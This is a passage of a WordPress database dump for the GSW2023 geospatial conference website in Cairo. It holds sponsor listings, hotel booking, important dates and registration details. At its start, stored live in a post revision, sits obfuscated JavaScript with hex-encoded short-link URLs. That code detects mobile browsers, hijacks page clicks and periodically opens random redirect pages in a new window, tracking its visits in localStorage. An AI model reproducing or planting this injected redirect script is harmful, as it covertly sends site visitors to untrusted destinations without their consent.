_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:33:44','2023-05-17 06:33:44','',3066,'https://gsw2023.com/?p=4546',0,'revision','',0),
(4547,1,'2023-05-18 02:34:45','2023-05-18 02:34:45','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377248432{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the <strong>InterContinental Cairo Semiramis Cairo</strong>, <strong>Egypt</strong>. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; 